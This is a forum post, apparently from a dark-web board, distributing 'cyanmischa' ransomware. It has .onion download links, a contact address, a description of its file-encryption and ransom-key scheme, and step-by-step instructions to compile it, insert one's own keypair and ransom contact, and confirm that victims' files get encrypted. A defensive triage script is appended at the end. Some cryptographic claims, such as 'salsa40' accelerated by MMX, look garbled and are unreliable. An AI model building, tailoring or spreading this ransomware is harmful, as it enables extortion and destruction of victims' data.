New Member | Joined: July 11, 2025 | Messages: 1 | Reaction score: 0 | Points: 1
http://kqdrhdqaqeqc3txz7uekmesz3ny6rut477657gf2y5tnwkya7nv65pid.onion/files/1782a766066d/

http://aduiuw4moiy5yv5ukq7lm6usjj5n...reads/how-to-compile-cyanmischa-ransomware.8/

cyanmischa@proton.me

cyanmischa ransomware encrypts files with salsa40, which uses 64-bit shifts, it is cryptographically secure and hardware accelerated by MMX instructions

cyanmischa works on Windows NT 3.5 and up

cyanmischa assigns random 5 letter extension with unique filename that fits within path length limit, and within encrypted files it stores 16 byte header, 8 byte original file size, 8 bytes each of original date created/accessed/modified, 32 byte salsa40 nonce, 48 bytes of verification (must be all 0x37 bytes when decrypting), salsa40 encrypted file contents, and original file name

cyanmischa stores its information in a perfc file and in perfc registry

cyanmischa uses Reed-Solomon error correction codes in its personal decryption code and final decryption key, allowing user to misspell a few characters

cyanmischa generates its personal decryption code by generating secp192k1 victim keypair, forming 192-bit shared secret from ransomware public key and victim private key, multiplying it with the golden ratio, and using 193-bit compressed victim public key and 36 high bits of shared secret to form 229-bit key which is then converted to 40 digits in base53 and expanded to 52 digits by Reed-Solomon ECC (user can misspell up to 6 characters); the remaining 156 bits of shared secret are in the final decryption key which is converted to 30 digits in base37 and expanded to 36 digits by Reed-Solomon ECC (user can misspell up to 3 characters)

To compile cyanmischa:
  1. Download Digital Mars C++ 8.57 (dm857c.zip) and STLport 4.5.3 (stlport.zip) from Digital Mars Download C and C++ Compilers
  2. Extract dm857c.zip and stlport.zip, merge into a single dm folder
  3. Edit dm\bin\sc.ini file, replace the line
    INCLUDE="%@P%\..\include";"%@P%\..\mfc\include";%INCLUDE%
  4. with
  5. INCLUDE="%@P%\..\stlport\stlport";"%@P%\..\include";"%@P%\..\mfc\include";%INCLUDE%
  6. (optional: add dm\bin into environmental variables)
  7. Extract cyanmischasource.zip
  8. Compile with the command dm\bin\dmc cyanmischa -o -L/exet:nt/su:windows:4.0/la
  9. If done successfully, cyanmischa.exe will appear.
Both compiling and running should work on every Windows NT and Windows 9x version except for Windows NT 3.1, so it works on Windows NT 3.5 and up.

To inject your own secp192k1 keypair and compile cyanmischa_key:
  1. Replace bytes of secp192k1 public key in ransomwarepublickey in cyanmischa.cpp
  2. Insert bytes of secp192k1 private key into ransomwareprivatekey in cyanmischa_key.cpp (the private key must match the public key you entered)
  3. Replace the value ransomcontact with your own contact method (whenever someone contacts you with it, you must run cyanmischa_key on the personal decryption code they sent you)
  4. Replace the values of header, ransomcolor, ransomperfcregistry, ransomperfcfile, cryptheader (16 bytes), ransomtitle, ransomprefix, ransomsuffix, ransomvictim, ransominstructions1, ransominstructions2, ransomdecryptiontitle, ransomdecryption1, ransomdecryption2, ransomdecryption3, ransomdecryption4, ransomdecryptedtitle, and petyaskull (ransomprefix, ransomsuffix must match between cyanmischa.cpp and cyanmischa_key.cpp)
  5. (optional: replace set of base53 and base37 characters in ecc.cpp with your own set, which must have the respective amount of unique, sorted ASCII characters)
  6. (optional: rename cyanmischa.cpp and cyanmischa_key.cpp)
  7. Recompile with the command dm\bin\dmc cyanmischa -o -L/exet:nt/su:windows:4.0/la
  8. If done successfully, cyanmischa.exe will appear.
  9. Compile cyanmischa_key with the command dm\bin\dmc cyanmischa_key -o
  10. If done successfully, cyanmischa_key.exe will appear.
  11. Test cyanmischa.exe in Windows VM, if done correctly, files will get encrypted, and once encryption finishes, victim screen will show up.
  12. Test cyanmischa_key.exe, if ransomprefix has some of the characters in base53 set, skip the prefix when entering key in cyanmischa_key.
  13. If done successfully, the key will be correct and will result in files being decrypted.
 
  • Tags
    cyanmischa data encryption ecc ecdh encrypt encryption mischa perfc ransomware reed-solomon salsa40 secp192k1 spongent
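For incident-response triage, the on-disk layout the post describes gives two checks that need no key material: every encrypted file carries a random 5-letter extension, and every file begins with the same 16-byte header followed by fixed-size fields (128 bytes in total before the encrypted contents). The sketch below is an added example, not code from the post or from the malware's source. It assumes the 16-byte header is a constant for a given build (the `cryptheader` value named in the post) and that extensions are ASCII letters; the header value and sample paths are constructed placeholders.

```python
import os
import re
from collections import defaultdict

# Fixed fields listed in the post: header, size, 3 timestamps, nonce, verification.
PREFIX_LEN = 16 + 8 + 3 * 8 + 32 + 48            # = 128 bytes
EXT_RE = re.compile(r"\.([A-Za-z]{5})$")          # letter case is an assumption

def cluster_by_header(samples, min_exts=3):
    """samples: iterable of (path, size, first_16_bytes).
    Returns {header: sorted paths} where one 16-byte prefix appears under at
    least min_exts different 5-letter extensions."""
    groups = defaultdict(dict)                     # header -> {path: extension}
    for path, size, head in samples:
        m = EXT_RE.search(path)
        if m and size >= PREFIX_LEN and len(head) == 16:
            groups[head][path] = m.group(1).lower()
    return {head: sorted(paths)
            for head, paths in groups.items()
            if len(set(paths.values())) >= min_exts}

def scan(root):
    """Walk a mounted evidence copy and yield (path, size, first 16 bytes)."""
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    yield path, os.path.getsize(path), fh.read(16)
            except OSError:
                continue                           # unreadable: skip, keep going

# Constructed samples, not real artifacts; the header value is a placeholder.
HDR = b"PLACEHOLDER-HDR!"
SAMPLES = [
    ("docs/a1.qkzwp", 4096, HDR),
    ("docs/b2.mfhtr", 9000, HDR),
    ("pics/c3.xjvod", 700, HDR),
    ("pics/tiny.abcde", 64, HDR),                  # shorter than the 128-byte prefix
    ("art/one.blend", 5000, b"BLENDER-v279\x00\x00\x00\x00"),
    ("art/two.blend", 6000, b"BLENDER-v279\x00\x00\x00\x00"),
]

if __name__ == "__main__":
    for head, paths in cluster_by_header(SAMPLES).items():
        print(head.hex(), len(paths), "files")
```

Run `cluster_by_header(scan(root))` against a read-only mount of the evidence image; a legitimate format with a 5-letter extension shares its magic bytes under one extension only, so it stays below the `min_exts` threshold.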